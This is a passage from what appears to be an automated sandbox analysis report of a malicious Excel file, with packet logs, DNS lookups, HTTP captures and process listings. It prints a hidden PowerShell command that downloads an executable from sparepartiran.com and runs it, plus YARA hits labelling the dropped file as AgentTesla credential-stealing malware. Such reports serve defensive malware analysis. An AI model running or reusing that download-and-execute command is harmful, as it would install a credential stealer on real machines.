                                                                                                                                        Nov 28, 2020 12:02:53.809782982 CET8049738162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.809799910 CET8049738162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.809823036 CET8049738162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.809843063 CET8049738162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.809865952 CET8049738162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.809886932 CET8049738162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.809907913 CET8049738162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.809928894 CET8049738162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.809937000 CET4973880192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.809973955 CET8049738162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.810023069 CET4973880192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.810111046 CET4973880192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.815829039 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.815870047 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.815886974 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.815908909 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.815932035 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.815953970 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.815978050 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816000938 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816023111 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.816072941 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.816277027 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816310883 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816333055 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816354036 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816375017 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816395998 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816404104 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.816417933 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816443920 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816463947 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.816467047 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816489935 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816508055 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.816561937 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.816613913 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816653967 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816680908 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816704035 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816715956 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.816751003 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.816883087 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816915035 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816936016 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.816956997 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.817018032 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.817039967 CET4973780192.168.2.5162.223.88.131
                                                                                                                                        Nov 28, 2020 12:02:53.817068100 CET8049737162.223.88.131192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.817111969 CET8049737162.223.88.131192.168.2.5

                                                                                                                                        UDP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Nov 28, 2020 12:01:08.364159107 CET5516153192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:08.391273975 CET53551618.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:09.094729900 CET5475753192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:09.130140066 CET53547578.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:22.701524973 CET4999253192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:22.739506960 CET53499928.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:23.206475019 CET6007553192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:23.241684914 CET53600758.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:24.221486092 CET6007553192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:24.259156942 CET53600758.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:25.235521078 CET6007553192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:25.273264885 CET53600758.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:27.236035109 CET6007553192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:27.271536112 CET53600758.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:30.003447056 CET5501653192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:30.042093039 CET53550168.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:31.504059076 CET6007553192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:31.539611101 CET53600758.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:34.552900076 CET6434553192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:34.579953909 CET53643458.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:52.780494928 CET5712853192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:52.824723005 CET53571288.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:58.266691923 CET5479153192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:58.303654909 CET53547918.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:01:59.683336973 CET5046353192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:01:59.710483074 CET53504638.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:02.474740028 CET5039453192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:02:02.518016100 CET53503948.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:04.472165108 CET5853053192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:02:04.508697987 CET53585308.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:34.004762888 CET5381353192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:02:34.031868935 CET53538138.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:52.382087946 CET6373253192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:02:52.417612076 CET53637328.8.8.8192.168.2.5
                                                                                                                                        Nov 28, 2020 12:02:53.194720984 CET5734453192.168.2.58.8.8.8
                                                                                                                                        Nov 28, 2020 12:02:53.230144978 CET53573448.8.8.8192.168.2.5

                                                                                                                                        DNS Queries

                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                        Nov 28, 2020 12:02:02.474740028 CET192.168.2.58.8.8.80xa0f9Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                                                                                                                        Nov 28, 2020 12:02:52.382087946 CET192.168.2.58.8.8.80xf3b9Standard query (0)sparepartiran.comA (IP address)IN (0x0001)
                                                                                                                                        Nov 28, 2020 12:02:53.194720984 CET192.168.2.58.8.8.80x848bStandard query (0)sparepartiran.comA (IP address)IN (0x0001)

                                                                                                                                        DNS Answers

                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                        Nov 28, 2020 12:02:02.518016100 CET8.8.8.8192.168.2.50xa0f9No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Nov 28, 2020 12:02:52.417612076 CET8.8.8.8192.168.2.50xf3b9No error (0)sparepartiran.com162.223.88.131A (IP address)IN (0x0001)
                                                                                                                                        Nov 28, 2020 12:02:53.230144978 CET8.8.8.8192.168.2.50x848bNo error (0)sparepartiran.com162.223.88.131A (IP address)IN (0x0001)

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • sparepartiran.com

                                                                                                                                        HTTP Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        0192.168.2.549737162.223.88.13180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Nov 28, 2020 12:02:52.572856903 CET4231OUTGET /js/2Q/0mrxdv.exe HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                        Host: sparepartiran.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Nov 28, 2020 12:02:53.579556942 CET4233INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 28 Nov 2020 11:02:53 GMT
                                                                                                                                        Server: Apache
                                                                                                                                        Last-Modified: Thu, 26 Nov 2020 22:27:22 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Content-Length: 518656
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 97 2b c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 be 03 00 00 2a 04 00 00 00 00 00 ee dc 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 dc 03 00 4b 00 00 00 00 e0 03 00 b8 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 bc 03 00 00 20 00 00 00 be 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 26 04 00 00 e0 03 00 00 28 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 03 00 00 00 00 00 48 00 00 00 02 00 05 00 84 31 00 00 78 37 00 00 03 00 00 00 6f 00 00 06 fc 68 00 00 98 73 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 85 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 36 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 03 00 00 00 43 00 00 00 38 00 00 00 5f 00 00 00 38 3e 00 00 00 02 28 06 00 00 06 20 00 00 00 00 17 3a d9 ff ff ff 26 38 cf ff ff ff 02 28 02 00 00 06 20 01 00 00 00 16 39 c2 ff ff ff 26 20 01 00 00 00 38 b7 ff ff ff 02 28 03 00 00 06 38 c2 ff ff ff 02 28 04 00 00 06 20 02 00 00 00 17 3a 9b ff ff ff 26 20 01 00 00 00 38 90 ff ff ff 2a 00 00 00 13 30 07 00 49 01 00 00 02 00 00 11 38 2a 00 00 00 fe 0c 02 00 45 07 00 00 00 11 00 00 00 67 00 00 00 83 00 00 00 b3 00 00 00 3c 00 00 00 a7 00 00 00 21 00 00 00 38 0c 00 00 00 20 d9 03 00 00 13 00 38 3a 00 00 00 17 28 09 00 00 06 20 02 00 00 00 38 be ff ff ff 2a 38 5c 00 00 00 20 00 00 00 00 28 08 00 00 06 39 a9 ff ff ff 26 38 9f ff ff ff 38 d0 ff ff ff 20 03 00 00 00 38 94 ff ff ff 73 02 00 00 0a 13 01 20 01 00 00 00 28 08 00 00 06 39 7e ff ff ff 26 38 74 ff ff ff 73 1d 00 00 06 13 05 20 05 00 00 00 28 08 00 00 06 39 62 ff ff ff 26 38 58 ff ff ff 11 01 6f 03 00 00 0a 11 00 6a 3c 21 00 00 00 20 04 00 00 00 28 08 00 00 06 39 3e ff ff ff 26 38 34 ff ff ff 11 01 6f 04 00 00 0a 38 6f ff ff ff 02 d0 04 00 00 01 28 0a 00 00 06 72 01 00 00 70 17 8d 05 00 00 01 13 03 11 03 16 d0 01 00 00 1b 28 0a 00 00 06 a2 11 03 28 05 00 00 0a 14 17 8d 02 00 00 01 13 04 11 04 16 11 05 6f 18 00 00 06 a2 11 04 6f 06 00 00 0a 74 04 00 00 01 7d 01 00 00 04 20 06 00 00 00 28 08 00 00 06 39 cb fe ff ff 26 20 05 00 00 00 38 c0
                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL+_* @ @@K& H.text `.rsrc&(@@.reloc @BH1x7ohs0(868EC8_8>( :&8( 9& 8(8( :& 8*0I8*Eg<!8 8:( 8*8\ (9&88 8s (9~&8ts (9b&8Xoj<! (9>&84o8o(rp((oot} (9& 8


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        1192.168.2.549738162.223.88.13180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Nov 28, 2020 12:02:53.373191118 CET4231OUTGET /js/2Q/0mrxdv.exe HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                        Host: sparepartiran.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Nov 28, 2020 12:02:53.809741974 CET4274INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 28 Nov 2020 11:02:53 GMT
                                                                                                                                        Server: Apache
                                                                                                                                        Last-Modified: Thu, 26 Nov 2020 22:27:22 GMT
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Content-Length: 518656
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 97 2b c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 be 03 00 00 2a 04 00 00 00 00 00 ee dc 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 dc 03 00 4b 00 00 00 00 e0 03 00 b8 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 bc 03 00 00 20 00 00 00 be 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 26 04 00 00 e0 03 00 00 28 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 03 00 00 00 00 00 48 00 00 00 02 00 05 00 84 31 00 00 78 37 00 00 03 00 00 00 6f 00 00 06 fc 68 00 00 98 73 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 85 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 36 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 03 00 00 00 43 00 00 00 38 00 00 00 5f 00 00 00 38 3e 00 00 00 02 28 06 00 00 06 20 00 00 00 00 17 3a d9 ff ff ff 26 38 cf ff ff ff 02 28 02 00 00 06 20 01 00 00 00 16 39 c2 ff ff ff 26 20 01 00 00 00 38 b7 ff ff ff 02 28 03 00 00 06 38 c2 ff ff ff 02 28 04 00 00 06 20 02 00 00 00 17 3a 9b ff ff ff 26 20 01 00 00 00 38 90 ff ff ff 2a 00 00 00 13 30 07 00 49 01 00 00 02 00 00 11 38 2a 00 00 00 fe 0c 02 00 45 07 00 00 00 11 00 00 00 67 00 00 00 83 00 00 00 b3 00 00 00 3c 00 00 00 a7 00 00 00 21 00 00 00 38 0c 00 00 00 20 d9 03 00 00 13 00 38 3a 00 00 00 17 28 09 00 00 06 20 02 00 00 00 38 be ff ff ff 2a 38 5c 00 00 00 20 00 00 00 00 28 08 00 00 06 39 a9 ff ff ff 26 38 9f ff ff ff 38 d0 ff ff ff 20 03 00 00 00 38 94 ff ff ff 73 02 00 00 0a 13 01 20 01 00 00 00 28 08 00 00 06 39 7e ff ff ff 26 38 74 ff ff ff 73 1d 00 00 06 13 05 20 05 00 00 00 28 08 00 00 06 39 62 ff ff ff 26 38 58 ff ff ff 11 01 6f 03 00 00 0a 11 00 6a 3c 21 00 00 00 20 04 00 00 00 28 08 00 00 06 39 3e ff ff ff 26 38 34 ff ff ff 11 01 6f 04 00 00 0a 38 6f ff ff ff 02 d0 04 00 00 01 28 0a 00 00 06 72 01 00 00 70 17 8d 05 00 00 01 13 03 11 03 16 d0 01 00 00 1b 28 0a 00 00 06 a2 11 03 28 05 00 00 0a 14 17 8d 02 00 00 01 13 04 11 04 16 11 05 6f 18 00 00 06 a2 11 04 6f 06 00 00 0a 74 04 00 00 01 7d 01 00 00 04 20 06 00 00 00 28 08 00 00 06 39 cb fe ff ff 26 20 05 00 00 00 38 c0
                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL+_* @ @@K& H.text `.rsrc&(@@.reloc @BH1x7ohs0(868EC8_8>( :&8( 9& 8(8( :& 8*0I8*Eg<!8 8:( 8*8\ (9&88 8s (9~&8ts (9b&8Xoj<! (9>&84o8o(rp((oot} (9& 8


                                                                                                                                        Code Manipulations

                                                                                                                                        Statistics

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        General

                                                                                                                                        Start time:12:01:20
                                                                                                                                        Start date:28/11/2020
                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                        Imagebase:0x240000
                                                                                                                                        File size:27110184 bytes
                                                                                                                                        MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:12:02:43
                                                                                                                                        Start date:28/11/2020
                                                                                                                                        Path:C:\Windows\splwow64.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                        Imagebase:0x7ff6990e0000
                                                                                                                                        File size:130560 bytes
                                                                                                                                        MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:12:02:47
                                                                                                                                        Start date:28/11/2020
                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}'
                                                                                                                                        Imagebase:0x7ff617cb0000
                                                                                                                                        File size:447488 bytes
                                                                                                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:12:02:48
                                                                                                                                        Start date:28/11/2020
                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}'
                                                                                                                                        Imagebase:0x7ff617cb0000
                                                                                                                                        File size:447488 bytes
                                                                                                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:12:02:48
                                                                                                                                        Start date:28/11/2020
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:12:02:48
                                                                                                                                        Start date:28/11/2020
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:12:02:54
                                                                                                                                        Start date:28/11/2020
                                                                                                                                        Path:C:\Users\Public\kzsuoseu.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Users\Public\kzsuoseu.exe'
                                                                                                                                        Imagebase:0x7ff64e5e0000
                                                                                                                                        File size:518656 bytes
                                                                                                                                        MD5 hash:B7679C443E22238291F5603F016FF56E
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.511700350.00000000041C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.510414491.00000000031C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.511341965.00000000032E6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 24%, Metadefender, Browse
                                                                                                                                        • Detection: 55%, ReversingLabs

                                                                                                                                        General

                                                                                                                                        Start time:12:02:59
                                                                                                                                        Start date:28/11/2020
                                                                                                                                        Path:C:\Users\Public\kzsuoseu.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Users\Public\kzsuoseu.exe'
                                                                                                                                        Imagebase:0xf40000
                                                                                                                                        File size:518656 bytes
                                                                                                                                        MD5 hash:B7679C443E22238291F5603F016FF56E
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.509493809.00000000035B6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.509988103.0000000004491000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                        General

                                                                                                                                        Start time:12:03:21
                                                                                                                                        Start date:28/11/2020
                                                                                                                                        Path:C:\Users\Public\kzsuoseu.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Users\Public\kzsuoseu.exe
                                                                                                                                        Imagebase:0xba0000
                                                                                                                                        File size:518656 bytes
                                                                                                                                        MD5 hash:B7679C443E22238291F5603F016FF56E
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001E.00000002.512846183.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                        General

                                                                                                                                        Start time:12:03:21
                                                                                                                                        Start date:28/11/2020
                                                                                                                                        Path:C:\Users\Public\kzsuoseu.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Users\Public\kzsuoseu.exe
                                                                                                                                        Imagebase:0x330000
